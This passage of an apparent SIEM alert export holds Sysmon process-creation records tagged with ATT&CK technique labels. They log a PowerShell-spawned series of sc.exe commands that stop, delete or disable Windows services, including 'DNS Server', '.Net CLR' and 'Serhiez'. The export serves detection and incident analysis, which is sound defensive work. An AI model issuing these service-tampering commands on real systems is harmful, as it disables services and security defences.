Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.065 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00100fab2e00} +ProcessId: 1688 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.067822500Z"",""eventRecordID"":""3521"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.065\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00100fab2e00}\r\nProcessId: 1688\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.065"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00100fab2e00}"",""processId"":""1688"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.065",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.023 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00104ea92e00} +ProcessId: 6348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net 
CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.028297700Z"",""eventRecordID"":""3519"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.023\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00104ea92e00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.023"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00104ea92e00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.026",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.999 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001074a82e00} +ProcessId: 8068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.006487600Z"",""eventRecordID"":""3518"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.999\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001074a82e00}\r\nProcessId: 8068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:04.999"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001074a82e00}"",""processId"":""8068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.923",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.924 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010cba42e00} +ProcessId: 8092 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.928841700Z"",""eventRecordID"":""3515"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.924\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010cba42e00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.924"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010cba42e00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.865",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.871 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102da22e00} +ProcessId: 7684 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.873194900Z"",""eventRecordID"":""3512"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.871\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102da22e00}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.871"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00102da22e00}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.854",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.852 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001056a12e00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.855080900Z"",""eventRecordID"":""3511"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.852\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001056a12e00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.852"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001056a12e00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.806",8,"ATT&CK T1489: Stop 
Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.823 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00} +ProcessId: 1760 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 